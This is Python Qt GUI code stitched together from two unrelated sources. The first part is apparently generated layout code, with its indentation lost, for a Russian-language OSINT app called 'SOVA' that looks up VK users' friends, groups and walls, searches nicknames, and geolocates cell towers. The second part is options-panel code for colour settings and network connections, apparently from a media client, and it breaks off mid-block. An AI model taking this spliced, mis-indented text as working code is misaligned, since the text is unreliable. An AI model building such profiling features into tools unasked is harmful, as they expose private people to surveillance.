self.le_BTSGeo_mcc.setFrame(True)
self.le_BTSGeo_mcc.setObjectName("le_BTSGeo_mcc")
self.horizontalLayout_7.addWidget(self.le_BTSGeo_mcc)
self.layoutWidget9 = QtWidgets.QWidget(self.splitter_3)
self.layoutWidget9.setObjectName("layoutWidget9")
self.horizontalLayout_9 = QtWidgets.QHBoxLayout(self.layoutWidget9)
self.horizontalLayout_9.setContentsMargins(2, 0, 2, 0)
self.horizontalLayout_9.setObjectName("horizontalLayout_9")
self.label_10 = QtWidgets.QLabel(self.layoutWidget9)
self.label_10.setObjectName("label_10")
self.horizontalLayout_9.addWidget(self.label_10)
self.le_BTSGeo_mnc = QtWidgets.QLineEdit(self.layoutWidget9)
self.le_BTSGeo_mnc.setText("")
self.le_BTSGeo_mnc.setObjectName("le_BTSGeo_mnc")
self.horizontalLayout_9.addWidget(self.le_BTSGeo_mnc)
self.layoutWidget10 = QtWidgets.QWidget(self.splitter_3)
self.layoutWidget10.setObjectName("layoutWidget10")
self.horizontalLayout_12 = QtWidgets.QHBoxLayout(self.layoutWidget10)
self.horizontalLayout_12.setContentsMargins(2, 0, 2, 0)
self.horizontalLayout_12.setObjectName("horizontalLayout_12")
self.label_11 = QtWidgets.QLabel(self.layoutWidget10)
self.label_11.setObjectName("label_11")
self.horizontalLayout_12.addWidget(self.label_11)
self.le_BTSGeo_lac = QtWidgets.QLineEdit(self.layoutWidget10)
self.le_BTSGeo_lac.setText("")
self.le_BTSGeo_lac.setObjectName("le_BTSGeo_lac")
self.horizontalLayout_12.addWidget(self.le_BTSGeo_lac)
self.layoutWidget11 = QtWidgets.QWidget(self.splitter_3)
self.layoutWidget11.setObjectName("layoutWidget11")
self.horizontalLayout_13 = QtWidgets.QHBoxLayout(self.layoutWidget11)
self.horizontalLayout_13.setContentsMargins(2, 0, 2, 0)
self.horizontalLayout_13.setObjectName("horizontalLayout_13")
self.label_12 = QtWidgets.QLabel(self.layoutWidget11)
self.label_12.setObjectName("label_12")
self.horizontalLayout_13.addWidget(self.label_12)
self.le_BTSGeo_cid = QtWidgets.QLineEdit(self.layoutWidget11)
self.le_BTSGeo_cid.setText("")
self.le_BTSGeo_cid.setObjectName("le_BTSGeo_cid")
self.horizontalLayout_13.addWidget(self.le_BTSGeo_cid)
spacerItem39 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_13.addItem(spacerItem39)
self.verticalLayout_7.addWidget(self.splitter_3)
self.horizontalLayout_42 = QtWidgets.QHBoxLayout()
self.horizontalLayout_42.setObjectName("horizontalLayout_42")
spacerItem40 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_42.addItem(spacerItem40)
self.main_pb_ShowBTSGeo = QtWidgets.QPushButton(self.layoutWidget7)
self.main_pb_ShowBTSGeo.setMinimumSize(QtCore.QSize(100, 0))
self.main_pb_ShowBTSGeo.setMaximumSize(QtCore.QSize(100, 23))
self.main_pb_ShowBTSGeo.setAutoRepeat(False)
self.main_pb_ShowBTSGeo.setAutoDefault(False)
self.main_pb_ShowBTSGeo.setDefault(False)
self.main_pb_ShowBTSGeo.setFlat(False)
self.main_pb_ShowBTSGeo.setObjectName("main_pb_ShowBTSGeo")
self.horizontalLayout_42.addWidget(self.main_pb_ShowBTSGeo)
self.main_pb_clearShowBTSGeo = QtWidgets.QPushButton(self.layoutWidget7)
self.main_pb_clearShowBTSGeo.setMinimumSize(QtCore.QSize(23, 23))
self.main_pb_clearShowBTSGeo.setMaximumSize(QtCore.QSize(23, 23))
self.main_pb_clearShowBTSGeo.setText("")
self.main_pb_clearShowBTSGeo.setObjectName("main_pb_clearShowBTSGeo")
self.horizontalLayout_42.addWidget(self.main_pb_clearShowBTSGeo)
spacerItem41 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_42.addItem(spacerItem41)
self.verticalLayout_7.addLayout(self.horizontalLayout_42)
self.textBrowser_BTSGeo = QtWidgets.QTextBrowser(self.layoutWidget7)
self.textBrowser_BTSGeo.setObjectName("textBrowser_BTSGeo")
self.verticalLayout_7.addWidget(self.textBrowser_BTSGeo)
self.verticalLayout_8.addLayout(self.verticalLayout_7)
self.verticalLayout_10.addWidget(self.splitter_5)
self.horizontalLayout_18.addWidget(self.splitter_13)
self.tabMain.addTab(self.tabGSM, "")
self.horizontalLayout_17.addWidget(self.tabMain)
self.groupBox_3 = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_3.setMinimumSize(QtCore.QSize(257, 0))
self.groupBox_3.setMaximumSize(QtCore.QSize(257, 16777215))
self.groupBox_3.setObjectName("groupBox_3")
self.verticalLayout_37 = QtWidgets.QVBoxLayout(self.groupBox_3)
self.verticalLayout_37.setObjectName("verticalLayout_37")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.groupBox = QtWidgets.QGroupBox(self.groupBox_3)
self.groupBox.setMaximumSize(QtCore.QSize(16777215, 109))
self.groupBox.setObjectName("groupBox")
self.verticalLayout_41 = QtWidgets.QVBoxLayout(self.groupBox)
self.verticalLayout_41.setObjectName("verticalLayout_41")
self.verticalLayout_40 = QtWidgets.QVBoxLayout()
self.verticalLayout_40.setSpacing(11)
self.verticalLayout_40.setObjectName("verticalLayout_40")
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setContentsMargins(-1, 4, -1, -1)
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.vk_labelUrlPict = QtWidgets.QLabel(self.groupBox)
self.vk_labelUrlPict.setObjectName("vk_labelUrlPict")
self.horizontalLayout_6.addWidget(self.vk_labelUrlPict)
self.vk_editShowPict = QtWidgets.QLineEdit(self.groupBox)
self.vk_editShowPict.setAlignment(QtCore.Qt.AlignCenter)
self.vk_editShowPict.setClearButtonEnabled(True)
self.vk_editShowPict.setObjectName("vk_editShowPict")
self.horizontalLayout_6.addWidget(self.vk_editShowPict)
self.verticalLayout_40.addLayout(self.horizontalLayout_6)
self.horizontalLayout_33 = QtWidgets.QHBoxLayout()
self.horizontalLayout_33.setObjectName("horizontalLayout_33")
spacerItem42 = QtWidgets.QSpacerItem(46, 17, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_33.addItem(spacerItem42)
self.vk_pbShowPict = QtWidgets.QPushButton(self.groupBox)
self.vk_pbShowPict.setMinimumSize(QtCore.QSize(100, 0))
self.vk_pbShowPict.setObjectName("vk_pbShowPict")
self.horizontalLayout_33.addWidget(self.vk_pbShowPict)
spacerItem43 = QtWidgets.QSpacerItem(45, 17, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_33.addItem(spacerItem43)
self.verticalLayout_40.addLayout(self.horizontalLayout_33)
self.verticalLayout_41.addLayout(self.verticalLayout_40)
self.verticalLayout.addWidget(self.groupBox)
self.groupBox_6 = QtWidgets.QGroupBox(self.groupBox_3)
self.groupBox_6.setObjectName("groupBox_6")
self.verticalLayout_42 = QtWidgets.QVBoxLayout(self.groupBox_6)
self.verticalLayout_42.setObjectName("verticalLayout_42")
self.main_Notebook = QtWidgets.QPlainTextEdit(self.groupBox_6)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(239, 242, 209))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(112, 114, 82))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(149, 153, 109))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(239, 242, 209))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(239, 242, 209))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(112, 114, 82))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(149, 153, 109))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(239, 242, 209))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(112, 114, 82))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(239, 242, 209))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(112, 114, 82))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(149, 153, 109))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(112, 114, 82))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(112, 114, 82))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(224, 229, 164))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.main_Notebook.setPalette(palette)
font = QtGui.QFont()
font.setFamily("Courier New")
self.main_Notebook.setFont(font)
self.main_Notebook.viewport().setProperty("cursor", QtGui.QCursor(QtCore.Qt.IBeamCursor))
self.main_Notebook.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu)
self.main_Notebook.setAutoFillBackground(False)
self.main_Notebook.setObjectName("main_Notebook")
self.verticalLayout_42.addWidget(self.main_Notebook)
self.verticalLayout.addWidget(self.groupBox_6)
self.groupBox_5 = QtWidgets.QGroupBox(self.groupBox_3)
self.groupBox_5.setMinimumSize(QtCore.QSize(0, 100))
self.groupBox_5.setMaximumSize(QtCore.QSize(16777215, 100))
self.groupBox_5.setObjectName("groupBox_5")
self.verticalLayout_43 = QtWidgets.QVBoxLayout(self.groupBox_5)
self.verticalLayout_43.setObjectName("verticalLayout_43")
self.horizontalLayout_35 = QtWidgets.QHBoxLayout()
self.horizontalLayout_35.setObjectName("horizontalLayout_35")
spacerItem44 = QtWidgets.QSpacerItem(20, 11, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_35.addItem(spacerItem44)
self.main_comboBox_style = QtWidgets.QComboBox(self.groupBox_5)
self.main_comboBox_style.setMinimumSize(QtCore.QSize(130, 0))
self.main_comboBox_style.setObjectName("main_comboBox_style")
self.main_comboBox_style.addItem("")
self.main_comboBox_style.addItem("")
self.main_comboBox_style.addItem("")
self.horizontalLayout_35.addWidget(self.main_comboBox_style)
spacerItem45 = QtWidgets.QSpacerItem(20, 11, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_35.addItem(spacerItem45)
self.verticalLayout_43.addLayout(self.horizontalLayout_35)
self.horizontalLayout_34 = QtWidgets.QHBoxLayout()
self.horizontalLayout_34.setObjectName("horizontalLayout_34")
spacerItem46 = QtWidgets.QSpacerItem(52, 14, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_34.addItem(spacerItem46)
self.main_pbChangeStyle = QtWidgets.QPushButton(self.groupBox_5)
self.main_pbChangeStyle.setMinimumSize(QtCore.QSize(100, 0))
self.main_pbChangeStyle.setObjectName("main_pbChangeStyle")
self.horizontalLayout_34.addWidget(self.main_pbChangeStyle)
spacerItem47 = QtWidgets.QSpacerItem(51, 14, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_34.addItem(spacerItem47)
self.verticalLayout_43.addLayout(self.horizontalLayout_34)
self.verticalLayout.addWidget(self.groupBox_5)
self.main_checkBox_sound = QtWidgets.QCheckBox(self.groupBox_3)
font = QtGui.QFont()
font.setPointSize(9)
font.setUnderline(True)
self.main_checkBox_sound.setFont(font)
self.main_checkBox_sound.setObjectName("main_checkBox_sound")
self.verticalLayout.addWidget(self.main_checkBox_sound)
self.verticalLayout_37.addLayout(self.verticalLayout)
self.horizontalLayout_17.addWidget(self.groupBox_3)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1285, 21))
self.menubar.setObjectName("menubar")
self.menu = QtWidgets.QMenu(self.menubar)
self.menu.setObjectName("menu")
self.menu_2 = QtWidgets.QMenu(self.menubar)
self.menu_2.setObjectName("menu_2")
MainWindow.setMenuBar(self.menubar)
self.action_aboutWindow = QtWidgets.QAction(MainWindow)
self.action_aboutWindow.setObjectName("action_aboutWindow")
self.action_startWindow = QtWidgets.QAction(MainWindow)
self.action_startWindow.setObjectName("action_startWindow")
self.action_empty = QtWidgets.QAction(MainWindow)
self.action_empty.setObjectName("action_empty")
self.action_Exit = QtWidgets.QAction(MainWindow)
self.action_Exit.setObjectName("action_Exit")
self.action_showLicenses = QtWidgets.QAction(MainWindow)
self.action_showLicenses.setObjectName("action_showLicenses")
self.action_ErrorsReport = QtWidgets.QAction(MainWindow)
self.action_ErrorsReport.setObjectName("action_ErrorsReport")
self.action_Tray = QtWidgets.QAction(MainWindow)
self.action_Tray.setObjectName("action_Tray")
self.action_Randomisator = QtWidgets.QAction(MainWindow)
self.action_Randomisator.setObjectName("action_Randomisator")
self.menu.addSeparator()
self.menu.addAction(self.action_Tray)
self.menu.addAction(self.action_Exit)
self.menu_2.addAction(self.action_startWindow)
self.menu_2.addAction(self.action_Randomisator)
self.menu_2.addSeparator()
self.menu_2.addAction(self.action_showLicenses)
self.menu_2.addAction(self.action_aboutWindow)
self.menu_2.addAction(self.action_ErrorsReport)
self.menubar.addAction(self.menu.menuAction())
self.menubar.addAction(self.menu_2.menuAction())
self.retranslateUi(MainWindow)
self.tabMain.setCurrentIndex(2)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "OSINT App \"SOVA\""))
self.vk_mainGroup.setTitle(_translate("MainWindow", "Управление"))
self.vk_groupSearchById.setTitle(_translate("MainWindow", "Информация (по id)"))
self.vk_checkFriends.setText(_translate("MainWindow", "друзья"))
self.vk_checkGroups.setText(_translate("MainWindow", "группы"))
self.vk_checkSubs.setText(_translate("MainWindow", "подписки"))
self.vk_checkFollowers.setText(_translate("MainWindow", "подписчики"))
self.vk_checkWall.setText(_translate("MainWindow", "показать стену"))
self.vk_labelSearchByIdRecords.setText(_translate("MainWindow", "запись(ей)"))
self.vk_pbRunSearchById.setText(_translate("MainWindow", " Просмотреть"))
self.vk_groupSearchByName.setTitle(_translate("MainWindow", "Поиск по имени"))
self.vk_CheckAge.setText(_translate("MainWindow", "учитывать возраст"))
self.vk_labelAge.setText(_translate("MainWindow", "Возраст:"))
self.vk_labelAgeFrom.setText(_translate("MainWindow", "От: "))
self.vk_labelAgeTo.setText(_translate("MainWindow", "До: "))
self.vk_chooseOnline.setText(_translate("MainWindow", "сейчас онлайн"))
self.vk_labelAge_2.setText(_translate("MainWindow", "Правило сортировки:"))
self.vk_comboSortRuleUser.setItemText(0, _translate("MainWindow", "популярность"))
self.vk_comboSortRuleUser.setItemText(1, _translate("MainWindow", "дата регистрации"))
self.vk_pbSearchByName.setText(_translate("MainWindow", " Найти"))
self.vk_groupIsMember.setTitle(_translate("MainWindow", "Принадлежность группе"))
self.vk_labelIsMemberUserId.setText(_translate("MainWindow", " user id: "))
self.vk_labelIsMemberGroupId.setText(_translate("MainWindow", " group id: "))
self.vk_pbCheckIsMember.setText(_translate("MainWindow", " Проверить"))
self.vk_groupSearchGroup.setTitle(_translate("MainWindow", "Поиск сообществ по названию"))
self.vk_labelSortRuleGroups.setText(_translate("MainWindow", "Правило сортировки:"))
self.vk_cBoxSortRuleGroups.setItemText(0, _translate("MainWindow", "по умолчанию"))
self.vk_cBoxSortRuleGroups.setItemText(1, _translate("MainWindow", "скорость роста"))
self.vk_cBoxSortRuleGroups.setItemText(2, _translate("MainWindow", "лайки/общ. число"))
self.vk_cBoxSortRuleGroups.setItemText(3, _translate("MainWindow", "посещ-ть/общ. число"))
self.vk_cBoxSortRuleGroups.setItemText(4, _translate("MainWindow", "коммент./общ. число"))
self.vk_cBoxSortRuleGroups.setItemText(5, _translate("MainWindow", "записи/общ. число"))
self.vk_pbRunSearchGroup.setText(_translate("MainWindow", " Найти"))
self.vk_groupIsMember_2.setTitle(_translate("MainWindow", "Статистика по друзьям"))
self.vk_labeGraphics.setText(_translate("MainWindow", " user id: "))
self.vk_pbShowDiagrams.setText(_translate("MainWindow", "Построить график"))
self.vk_pbSaveResult.setText(_translate("MainWindow", " Сохранить результат"))
self.vk_pbClearForm.setText(_translate("MainWindow", " Очистить форму"))
self.ok_groupSearchGroup_3.setTitle(_translate("MainWindow", "Определение ID по ссылке/нику"))
self.vk_pbGetID.setText(_translate("MainWindow", " Получить"))
self.tabMain.setTabText(self.tabMain.indexOf(self.tabVK), _translate("MainWindow", "vk"))
self.gbox_SearchUserName.setTitle(_translate("MainWindow", "Общий по никнейму (SNOOP Project)"))
self.main_pbSearchUser.setText(_translate("MainWindow", " Найти"))
| |
colour_panel = QW.QWidget( self._notebook )
colour_types = []
colour_types.append( CC.COLOUR_THUMB_BACKGROUND )
colour_types.append( CC.COLOUR_THUMB_BACKGROUND_SELECTED )
colour_types.append( CC.COLOUR_THUMB_BACKGROUND_REMOTE )
colour_types.append( CC.COLOUR_THUMB_BACKGROUND_REMOTE_SELECTED )
colour_types.append( CC.COLOUR_THUMB_BORDER )
colour_types.append( CC.COLOUR_THUMB_BORDER_SELECTED )
colour_types.append( CC.COLOUR_THUMB_BORDER_REMOTE )
colour_types.append( CC.COLOUR_THUMB_BORDER_REMOTE_SELECTED )
colour_types.append( CC.COLOUR_THUMBGRID_BACKGROUND )
colour_types.append( CC.COLOUR_AUTOCOMPLETE_BACKGROUND )
colour_types.append( CC.COLOUR_MEDIA_BACKGROUND )
colour_types.append( CC.COLOUR_MEDIA_TEXT )
colour_types.append( CC.COLOUR_TAGS_BOX )
for colour_type in colour_types:
ctrl = ClientGUICommon.BetterColourControl( colour_panel )
ctrl.setMaximumWidth( 20 )
ctrl.SetColour( self._new_options.GetColour( colour_type, colourset ) )
self._gui_colours[ colourset ][ colour_type ] = ctrl
#
rows = []
hbox = QP.HBoxLayout()
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BACKGROUND], CC.FLAGS_VCENTER )
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BACKGROUND_SELECTED], CC.FLAGS_VCENTER )
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BACKGROUND_REMOTE], CC.FLAGS_VCENTER )
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BACKGROUND_REMOTE_SELECTED], CC.FLAGS_VCENTER )
rows.append( ( 'thumbnail background (local: normal/selected, remote: normal/selected): ', hbox ) )
hbox = QP.HBoxLayout()
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BORDER], CC.FLAGS_VCENTER )
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BORDER_SELECTED], CC.FLAGS_VCENTER )
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BORDER_REMOTE], CC.FLAGS_VCENTER )
QP.AddToLayout( hbox, self._gui_colours[colourset][CC.COLOUR_THUMB_BORDER_REMOTE_SELECTED], CC.FLAGS_VCENTER )
rows.append( ( 'thumbnail border (local: normal/selected, remote: normal/selected): ', hbox ) )
rows.append( ( 'thumbnail grid background: ', self._gui_colours[ colourset ][ CC.COLOUR_THUMBGRID_BACKGROUND ] ) )
rows.append( ( 'autocomplete background: ', self._gui_colours[ colourset ][ CC.COLOUR_AUTOCOMPLETE_BACKGROUND ] ) )
rows.append( ( 'media viewer background: ', self._gui_colours[ colourset ][ CC.COLOUR_MEDIA_BACKGROUND ] ) )
rows.append( ( 'media viewer text: ', self._gui_colours[ colourset ][ CC.COLOUR_MEDIA_TEXT ] ) )
rows.append( ( 'tags box background: ', self._gui_colours[ colourset ][ CC.COLOUR_TAGS_BOX ] ) )
gridbox = ClientGUICommon.WrapInGrid( colour_panel, rows )
colour_panel.setLayout( gridbox )
select = colourset == 'default'
self._notebook.addTab( colour_panel, colourset )
if select: self._notebook.setCurrentWidget( colour_panel )
#
coloursets_panel.Add( ClientGUICommon.WrapInText( self._current_colourset, coloursets_panel, 'current colourset: ' ), CC.FLAGS_EXPAND_SIZER_PERPENDICULAR )
coloursets_panel.Add( self._notebook, CC.FLAGS_EXPAND_BOTH_WAYS )
vbox = QP.VBoxLayout()
QP.AddToLayout( vbox, coloursets_panel, CC.FLAGS_EXPAND_PERPENDICULAR )
QP.AddToLayout( vbox, QW.QWidget( self ), CC.FLAGS_EXPAND_BOTH_WAYS )
self.setLayout( vbox )
def UpdateOptions( self ):
    """Flush the colour picker widgets back into the options object.
    
    Saves every colourset's per-type colour and records which colourset is
    currently selected.
    """
    
    for ( colourset, colour_controls ) in self._gui_colours.items():
        
        for ( colour_type, ctrl ) in list( colour_controls.items() ):
            
            self._new_options.SetColour( colour_type, colourset, ctrl.GetColour() )
            
        
    
    self._new_options.SetString( 'current_colourset', self._current_colourset.GetValue() )
    
class _ConnectionPanel( QW.QWidget ):
    """Options page for network connection settings: timeouts, retry waits,
    simultaneous-job limits, and HTTP/HTTPS proxy configuration."""
    
    def __init__( self, parent ):
        
        QW.QWidget.__init__( self, parent )
        
        self._new_options = HG.client_controller.new_options
        
        general = ClientGUICommon.StaticBox( self, 'general' )
        
        self._verify_regular_https = QW.QCheckBox( general )
        
        # Advanced mode unlocks much wider (and more dangerous) ranges for the
        # timeout/wait/job-count spin boxes; a warning label is added below.
        if self._new_options.GetBoolean( 'advanced_mode' ):
            
            network_timeout_min = 1
            network_timeout_max = 86400 * 30
            
            error_wait_time_min = 1
            error_wait_time_max = 86400 * 30
            
            max_network_jobs_max = 1000
